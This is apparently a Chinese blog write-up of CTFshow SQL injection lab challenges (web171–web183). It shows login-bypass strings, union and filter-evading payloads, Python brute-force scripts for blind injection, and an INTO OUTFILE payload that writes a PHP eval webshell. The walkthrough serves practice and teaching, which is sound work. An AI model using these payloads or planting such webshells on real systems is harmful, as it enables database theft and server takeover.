【CTF】CTFshow-SQL注入(持续更新)

最新推荐文章于 2024-05-16 14:48:53 发布
最新推荐文章于 2024-05-16 14:48:53 发布
阅读量502 收藏 3
点赞数 2
分类专栏: web学习 CTF 练习靶场WP 文章标签: sql 数据库 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53099119/article/details/131318408
版权
web学习 同时被 3 个专栏收录
5 篇文章 1 订阅
订阅专栏
CTF
5 篇文章 1 订阅
订阅专栏
练习靶场WP
5 篇文章 0 订阅
订阅专栏

【CTF】CTFshow-SQL注入(持续更新)

​ 就剩一年的大学时光了,最近也很迷茫,想找实习,又得考托福,又想提前开始毕设,假期前又要上学校安排的实训,马上还又有一门考试,事情一堆,但又感觉整天不知道自己应该做什么。

​ 在过完了我给自己安排的两个gap day后,想着那就索性照着实训的安排给自己再简简单单过一遍SQL注入吧,顺便把CTFshow刷一刷。

文章目录

万能密码

普通万能密码:

' or 1=1#
' or 1=1--+

骚套路万能密码:

ffifdyop
经过md5加密后:276f722736c95d99e921722cf9ed621c
再转换为字符串:'or'6<乱码>`'or'66�]��!r,��b`
select * from admin where password=''or'6<乱码>' 
就相当于select * from admin where password=''or 1 实现sql注入

新型万能密码:

(刚看到的一个网站中写到的)

当所有能用的东西都被过滤了,即可使用:

username =  secpulse'='  password = secpulse'='
拼接起来就是:
select * from table where username='secpulse'='' and passowrd = 'secpulse'='';
sql解释引擎是从左至右执行: 数据库没有secpulse这个用户,结果是false false = '' 结果就是true
CTFshow-web171:

payload:

1' or 1=1%23

Union联合注入

找到注入点后,用order by判断列数,构造payload,即可在联合查询中执行自己所想执行的查询命令

CTFshow-web172:

payload:

题目:

会判断username中是否存在flag字样:
if($row->username!=='flag'){
      $ret['msg']='查询成功';
}
SQL源码:
//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user2 where username !='flag' and id = '".$_GET['id']."' limit 1;";

因为username中不能出现flag字符串,可以用hex编码或base64绕过:

payload1:
-1' union select hex(username),password from ctfshow_user2 where username='flag
payload2:
-1' union select to_base64(username),password from ctfshow_user2 where username='flag
CTFshow-web173:

和web172不同的是这题对回显的内容也做了判断

if(!preg_match('/flag/i', json_encode($ret))){
      $ret['msg']='查询成功';
}

payload:

1' union select 1,2,password from ctfshow_user3 where username='flag'%23
CTFshow-web174:

replace替换绕过过滤

从源码看出本题不允许返回的内容中有数字,可以使用replace将各个被过滤的字符进行替换,收到后再将其替换回即可:

构造替换脚本:

i = 0
s = f"replace(password,'{i}','xx{chr(i + 65)}')"
for i in range(1,10):
    s = f"replace({s},'{i}','xx{chr( i + 65)}')"
    print(s)

通过replace的替换,可以将返回值中的数字都替换成指定的xxX形式的字符串,然后将得到的结果在替换回来并解码即可:

rsl='xxGxxDxxHxxExxGxxGxxHxxDxxGxxIxxGFxxHxxHxxHBxxGxxFxxDxxGxxDxxHxxGxxDxxD' \
    'xxHxxDxxCxxGxxBxxDxxHxxCDxxDxxGxxGxxCxxGxxDxxDxxAxxCDxxDxxExxGxxExxGxxExxD' \
    'xxFxxCDxxDxxIxxDxxIxxGxxBxxDxxIxxCDxxGxxDxxGxxDxxDxxGxxGxxGxxDxxFxxGxxGxxDxx' \
    'FxxDxxAxxDxxBxxGxxDxxDxxDxxGxxBxxHD'
rsl=rsl.replace('xxA','0').replace('xxB','1').replace('xxC','2').replace('xxD','3').replace('xxE','4')\
    .replace('xxF','5').replace('xxG','6').replace('xxH','7').replace('xxI','8').replace('xxJ','9')
flag = bytes.fromhex(rsl).decode("ascii")
print(flag)

注入点写文件

CTFshow-web175

从本题逻辑可以看出,本题不允许返回hex编码为0x00-0x7f区域内的内容,因此本题是无法正常返回我们的查询结果的,可以考虑使用into outfile的方法将一句话木马写到指定的文件中,使用蚁剑:

//检查结果是否有flag
    if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))){
      $ret['msg']='查询成功';
}

payload:

-1' union select 1,"<?php eval($_POST[1]);?>" into outfile'/var/www/html/1.php

蚁剑连接后在config.php中找到数据库的用户密码,登录即可查询flag

$dbhost ="127.0.0.1";

$dbuser = "root";

$dbpwd = "root";

$dbname = "ctfshow_web";

$charName = "utf-8"; 

SELECT * from ctfshow_user5;

绕过select过滤

CTFshow-web176:

这题使用先想到用联合查询,但发现被过滤了,但是!这题原来用万能密码就能出:

payload:

1' or 1=1--+

绕过空格过滤

CTFshow-web177

payload:

1'/**/or/**/1=1%23
CTFshow-web178

过滤了#、–、/**/(反正都用不了),用%0a代替空格构造

payload:

-1'%0aunion%0aselect%0a1,group_concat(password),3%0afrom%0actfshow_user%23
CTFshow-web179

本题把%0a也给过滤了,使用%0c也可以实现绕过空格的效果

payload:

1'union%0cselect%0c1,2,group_concat(password)%0cfrom%0cctfshow_user%23
CTFshow-web180

这题多过滤了一个%23注释,就用单引号闭合的方式吧

payload:

-1'union%0cselect%0c1,group_concat(password),3%0cfrom%0cctfshow_user%0cwhere'1'='1
CTFshow-web181

题目:

function waf($str){
	return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select/i', $str);
}

本题过滤的有点彻底,看了其他师傅的WP后,原来还可以:

0'||username='flag

在MySQL中,||表示的是或符号,由于前方的id为0时无数据,因此会显示username=‘flag的内容。

CTFshow-web182

题目

function waf($str){
    return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select|flag/i', $str);
}

payload:

-1'or(id=26)and'1'='1

盲注

盲注可以分为时间盲注和布尔盲注

时间盲注:

使用if判断、sleep函数,通过页面的回显时间是否存在延时来判断是否可注入。

布尔盲注:

通过页面的返回状态进行拆解

CTFshow-web183

题目:

waf部分:
//对传入的参数进行了过滤
function waf($str){
	return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\#|\x23|file|\=|or|\x7c|select|and|flag|into/i', $str);
}
sql部分:
    $sql = "select count(pass) from ".$_POST['tableName'].";";

过滤较多,常规的盲注用不了,可以考虑使用Mysql的正则regexp

基本用法:

select * from table_name where name like 'Sunny';
select * from table_name where name regexp 'Sunny';

select column_name from table_name where column regexp 'flag|ctfshow'
select column_name from table_name where column regexp '[0-9]test'

本题参数使用的post传参,exp:

import requests
import string

url="http://6c365f8a-328f-4768-b99a-e75bc2a72ddd.challenge.ctf.show/select-waf.php"
flag=""
strr=string.ascii_lowercase+"_-{}"+string.digits

for i in range(50):
    for j in strr:
        payload = "(ctfshow_user)where(pass)regexp\"ctfshow{" + flag + j +"\""
        data = {
            "tableName": payload
        }
        re = requests.post(url, data=data)
        if "$user_count = 1" in re.text:
            flag += j
    if flag[-1] == '}':
        print(flag)

这题exp很奇怪,我刚开始在找到一个能够正常回显的flag字符位的时候就break跳出这一位的判断,但是当匹配到0}的时候居然也能够正常返回,最后出来的flag就怪怪的,后面看了其他师傅的wp改了一下就正常了。

Sunny-Dog
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
ctf-all-in-one
01-30
ctf-all-in-one
CTFSHOW WEB入门——sql注入
Chur的博客
07-22 4277
ctfshow 靶场 web入门 sql注入系列
CTFSHOW-sql注入
Yb_140的博客
08-13 2466
web171 最简单的sql注入,先演示基本操作 payload: -1' union select 1,2,database() --+ //得到数据库名为ctfshow_web -1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web' --+ //得到数据表名为ctfshow_user -1' union select
CTF Web SQL注入专项整理(持续更新中)_ctf sql注入
最新发布
2401_84969642的博客
05-16 344
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
ctfshow---sql注入(171-213)
fainpo的博客
05-01 724
这里提一句,为什么不直接替换成acb这种,因为,flag原本就有字母,还原的时候会全部都还原成数字的,数字替换成符号应该也是可以的,这边测试了下除了&#好像别的符号都可以。插入查询后查询语句就会变成这样,由于id=11111这是一个不存在的id,而后面1=1又为真,所以会查询到表内所有的内容,--+是注释后面的字符。因为接受username的时候没有用引号,所以接受单纯的数字,而数字和字符比较会转换类型,字符串会变成数字0进行比较,所以相等。
ctfshow-sql注入
m0_72898152的博客
03-07 829
ctfsql注入
CTFshow-WEB入门-SQL注入(下)
feng的博客
02-11 2047
web227 按照上一题的方法,发现查不出flag表了,把ctfshow_user表给爆了一下也没flag,然后写一句话马,蚁剑连上去还是找不到flag,人傻了。。。 看了一下y4师傅的WP,原来这题考的是存储过程: 存储过程(Stored Procedure)是一种在数据库中存储复杂程序,以便外部程序调用的一种数据库对象。 存储过程是为了完成特定功能的SQL语句集,经编译创建并保存在数据库中,用户可通过指定存储过程的名字并给定参数(需要时)来调用执行。 存储过程思想上很简单,就是数据库 SQL 语言层面
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
ctfshow-web41~60-WP
02-21
本篇文章主要关注的是CTFShow中的Web挑战第41至60题的解题思路与技术细节,尤其是题目41中的命令注入攻击。 #### 题目背景与目标 在题目41中,参与者需要分析给定的PHP代码片段,理解其逻辑并找到漏洞所在。目标是...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
ctfshow——SQL注入
qq_55202378的博客
04-30 1396
前者恒为真,如果and前面的语句有内容,则正常输出;后者恒为假,如果and前面的语句有内容,也不会输出。故,可以通过他们俩来判断SQL注入类型。查看页面源代码,发现一个js文件。访问该文件,会发现一个查询接口。一种方法是抓取数据包,让sqlmap跑数据包;不知道为啥这里%0c没有被过滤。的时候,需要使前面一条语句错误。伪造referer。这一关开始使用sqlmap。进行报错注入的时候,需要对。(+的url编码)替换。指定 sqlmap 以。参数指定要测试的网址,
CTFshow——web入门——sql注入
h_adam的博客
03-14 5546
web入门——sql注入基础知识点判断是否注入order by 判断列数web171web172web173 基础知识点 判断是否注入 使用注释符–+ +代表的是空格 或者使用%23来做注释符 1' and 1=1%23 order by 判断列数 order by 是根据某一列进行排序 使用 1' order by 3--+ 返回正常 1' order by 4--+ 没有数据 说明列数是3 web171 本地测试,查询id为id = '9999' or id='3',9999不存在时会查询id=3
CTFSHOW -SQL 注入
m0_64180167的博客
11-13 683
重新来做一遍 争取不看wp。
ctfshow---sql注入(214-253)
fainpo的博客
05-15 3048
时间盲注了打开页面什么都没有,抓包也什么都没有,抓一下这个原始页面的包可以看到里面有参数将debug修改成1后可以看到有返回的内容既然说是时间盲注那么直接将ip修改成sleep(3) 成功延时三秒后显示内容。
CTFSHOW sql注入(一)
qq_51754713的博客
10-04 4885
title: CTFSHOW-sql注入(一) data: 2021-09-15 tags: CTF-web CTFSHOW sql注入(一) 开始一周的高强度sql注入训练,先从ctfshow 的基础开始。 包含了CTFSHOW sql注入的 170-200题。 这里都是sql注入的一些基本知识点。主要是了解sql注入的常见题型。 题目 web 171(万能密码) 万能密码: 1'or 1=1-- - web 172(过滤回显内容) 这里看出有一定的waf,我们并不能在username里面.
ctfshow sql注入
weixin_56537388的博客
08-17 85
可以看出有3个字段,采用联合查询的方式,查找数据库,%23代表#号MariaDB是MySQL的分支使用group_concat可以输出多个结果,这里因为只有一个结果,mysql5.0以上的版本有information_schema,可以省下拆解的过程这里跑出列名这里跑出数据,flag为ctfshow{dc5b040b-cb74-479c-9b2f-a6a4e2b84c0f}
CTFshow之web171~180---SQL注入(1)
金 帛的博客
06-04 2279
ctfshow,SQL注入的wp
ctfshow- sql注入(web入门)
..
11-19 1619
web174 这道题可以先在查询框中随便查询1或2或3,发现没有回显,猜测一下可能是盲注。 首先用bp抓包试一下,得到关键信息 http://f5096abc-7db4-4448-8da0-fccd604899d9.challenge.ctf.show/api/v3.php?id=11&page=1&limit=10 用脚本尝试一下没有回显信息,根据前面的经验,这是第四题尝试改为v4.php?id=1,发现出现回显信息。 我们可以这样写脚本 import r.
ctfshow-web-web红包题
07-14
这可能导致一个被称为SQL注入的漏洞。 我们试图通过在参数中插入恶意代码来进行SQL注入攻击。我们发现当我们输入`' or 1=1 -- `时,查询结果会返回所有订单记录,而不仅仅是当前用户的订单。这表明成功利用了SQL...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sunny-Dog

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值